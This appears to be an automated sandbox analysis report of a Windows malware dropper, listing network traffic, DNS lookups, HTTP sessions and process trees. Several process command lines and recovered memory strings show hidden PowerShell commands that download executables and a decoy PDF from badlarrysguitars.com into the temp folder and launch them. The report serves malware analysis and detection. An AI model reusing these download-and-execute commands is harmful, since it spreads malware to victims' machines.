                                                          Dec 6, 2024 15:42:41.789530039 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.792776108 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.792836905 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.792844057 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.794960022 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.795087099 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.795094967 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.840667009 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.888534069 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.888550043 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.888617039 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.888637066 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.891088963 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.891165972 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.891172886 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.934437990 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.949852943 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.949875116 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.949940920 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.949973106 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.952589989 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.952644110 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.952677011 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.952688932 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.952812910 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.955045938 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.955060005 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.955121994 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.958337069 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.958400011 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.958406925 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.958451033 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.960887909 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.960947037 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.963606119 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.963689089 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.963700056 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.966869116 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.967010021 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.967017889 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.969649076 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.969711065 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.969717979 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.972547054 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.972614050 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.972625017 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.974736929 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.974802971 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.974812984 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.977792025 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.978121996 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.978153944 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.980402946 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.980489016 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.980499029 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.983634949 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.983786106 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.983794928 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.986212969 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.986274004 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.986284018 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.013902903 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:42.115876913 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.115955114 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:42.115971088 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.118448019 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.118515968 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:42.118536949 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.168829918 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:42.171185970 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.171210051 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:42.171303034 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:42.171329975 CET44349794101.99.75.174192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 6, 2024 15:42:01.400823116 CET | 192.168.2.11 | 1.1.1.1 | 0xb690 | Standard query (0) | badlarrysguitars.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:42:20.704823971 CET | 192.168.2.11 | 1.1.1.1 | 0x7e14 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 6, 2024 15:42:01.984782934 CET | 1.1.1.1 | 192.168.2.11 | 0xb690 | No error (0) | badlarrysguitars.com | | 101.99.75.174 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:42:19.105338097 CET | 1.1.1.1 | 192.168.2.11 | 0x24ab | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:42:19.105338097 CET | 1.1.1.1 | 192.168.2.11 | 0x24ab | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:42:20.992559910 CET | 1.1.1.1 | 192.168.2.11 | 0x7e14 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49706 | 101.99.75.174 | 443 | 7600 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-06 14:42:03 UTC | 178 | OUT | GET /share/drp.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: badlarrysguitars.com
    Connection: Keep-Alive
2024-12-06 14:42:04 UTC | 330 | IN | HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 14:42:03 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 64456
    Last-Modified: Sun, 17 Nov 2024 15:37:43 GMT
    Content-Disposition: inline; filename=drp.exe
    Cache-Control: no-cache
    ETag: "1731857863.0-64456-2350713368"
    Connection: close
    Content-Type: application/x-msdos-program


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49717 | 101.99.75.174 | 443 | 7820 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-06 14:42:07 UTC | 180 | OUT | GET /share/alert.pdf HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: badlarrysguitars.com
    Connection: Keep-Alive
2024-12-06 14:42:08 UTC | 322 | IN | HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 14:42:08 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 126079
    Last-Modified: Fri, 15 Nov 2024 19:44:32 GMT
    Content-Disposition: inline; filename=alert.pdf
    Cache-Control: no-cache
    ETag: "1731699872.0-126079-2713651938"
    Connection: close
    Content-Type: application/pdf


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.11 | 49761 | 3.219.243.226 | 443 | 3796 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-06 14:42:21 UTC | 1353 | OUT | OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                          Host: p13n.adobe.io
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Access-Control-Request-Method: GET
                                                          Access-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-key
                                                          Origin: https://rna-resource.acrobat.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://rna-resource.acrobat.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-06 14:42:22 UTC | 572 | IN | HTTP/1.1 204 No Content
                                                          Server: openresty
                                                          Date: Fri, 06 Dec 2024 14:42:22 GMT
                                                          Content-Type: text/plain
                                                          Content-Length: 0
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, OPTIONS
                                                          Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                          Access-Control-Allow-Credentials: true
                                                          Access-Control-Expose-Headers: x-request-id
                                                          X-Request-Id: cxdwBCsucDBiXD7cI4EFml9KH2iegfA7
                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.11 | 49767 | 3.219.243.226 | 443 | 3796 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-06 14:42:23 UTC | 1473 | OUT | GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                          Host: p13n.adobe.io
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Chromium";v="105"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                          x-adobe-uuid: 14bb0f07-155a-4922-8830-76ed60af57ca
                                                          x-adobe-uuid-type: visitorId
                                                          x-api-key: AdobeReader9
                                                          sec-ch-ua-platform: "Windows"
                                                          Origin: https://rna-resource.acrobat.com
                                                          Accept-Language: en-US,en;q=0.9
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://rna-resource.acrobat.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          2024-12-06 14:42:24 UTC | 617 | IN | HTTP/1.1 429 Too Many Requests
                                                          Server: openresty
                                                          Date: Fri, 06 Dec 2024 14:42:23 GMT
                                                          Content-Type: application/json
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Headers: Authorization, Content-Type, X-Api-Key, cache-control, User-Agent, If-None-Match, x-adobe-uuid, x-adobe-uuid-type, X-Request-Id
                                                          Access-Control-Expose-Headers: x-request-id
                                                          Access-Control-Allow-Methods: GET, OPTIONS
                                                          Access-Control-Allow-Credentials: true
                                                          X-Request-Id: BhsTUMtMBz6x7izm4MgfyJZ4UGQp67KM
                                                          Retry-After: 1
                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                          2024-12-06 14:42:24 UTC | 65 | IN | Data Raw: 33 36 0d 0a 7b 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 22 34 32 39 30 35 30 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 22 7d 0a 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 36{"error_code":"429050","message":"Too many requests"}0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.11 | 49794 | 101.99.75.174 | 443 | 3400 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-06 14:42:35 UTC | 181 | OUT | GET /private/nois.exe HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: badlarrysguitars.com
                                                          Connection: Keep-Alive
                                                          2024-12-06 14:42:35 UTC | 337 | IN | HTTP/1.1 200 OK
                                                          Date: Fri, 06 Dec 2024 14:42:35 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Content-Length: 64487543
                                                          Last-Modified: Tue, 19 Nov 2024 17:09:39 GMT
                                                          Content-Disposition: inline; filename=nois.exe
                                                          Cache-Control: no-cache
                                                          ETag: "1732036179.0-64487543-2940406643"
                                                          Connection: close
                                                          Content-Type: application/x-msdos-program


                                                          Target ID:0
                                                          Start time:09:41:55
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden"
                                                          Imagebase:0x7ff6eb350000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:09:41:55
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:09:41:58
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe)
                                                          Imagebase:0x7ff6eb350000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:09:41:58
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:09:42:03
                                                          Start date:06/12/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\nthelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\nthelper.exe"
                                                          Imagebase:0x400000
                                                          File size:64'456 bytes
                                                          MD5 hash:1CEB5D0CB063290C1F66FCCFED96A220
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 8%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:09:42:03
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                          Imagebase:0x7ff6eb350000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:09:42:04
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:09:42:08
                                                          Start date:06/12/2024
                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
                                                          Imagebase:0x7ff688b00000
                                                          File size:5'641'176 bytes
                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:9
                                                          Start time:09:42:09
                                                          Start date:06/12/2024
                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                          Imagebase:0x7ff6e9af0000
                                                          File size:3'581'912 bytes
                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:10
                                                          Start time:09:42:09
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ff68dea0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:11
                                                          Start time:09:42:09
                                                          Start date:06/12/2024
                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1640,i,16748263348592557741,8757425967150341878,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                          Imagebase:0x7ff6e9af0000
                                                          File size:3'581'912 bytes
                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:18
                                                          Start time:09:42:31
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
                                                          Imagebase:0x7ff6eb350000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:19
                                                          Start time:09:42:31
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1367412246.00007FFE7DE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffe7de00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                            • Instruction ID: 13c77383cd58c274ecb887bb6b6a48fe338aedfb1f669825bbef80fa4d9d60cc
                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                            • Instruction Fuzzy Hash: 3901A73111CB0C4FD744EF0CE451AA5B3E0FB85320F10052EE58AC3661DA36E882CB41
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1555684676.00007FFE7DDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DDD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffe7ddd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                            • Instruction ID: 3fa855091d4645b6f54f512c9f000f331cb6d653f3326614ac405ed21cfbf121
                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                            • Instruction Fuzzy Hash: A401677111CB0D4FDB54EF0CE451AA6B7E0FB95364F10066EE58AC3661D736E882CB45
                                                            Strings
                                                            • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), xrefs: 0040100B
                                                            • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"), xrefs: 00401016
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2569094939.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2569001048.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000005.00000002.2569177519.0000000000402000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000005.00000002.2569266147.0000000000404000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_nthelper.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")$powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                            • API String ID: 0-3628893888
                                                            • Opcode ID: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                            • Instruction ID: 1508df73bb81b20edbd2416e362e01711401bb553aa95eecbcdc2692af4642b4
                                                            • Opcode Fuzzy Hash: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                            • Instruction Fuzzy Hash: 6C312D31715B408EF7509B66E89038E36B4E788788F50427AEF5DE7BA9EF39C5408744
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2569094939.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
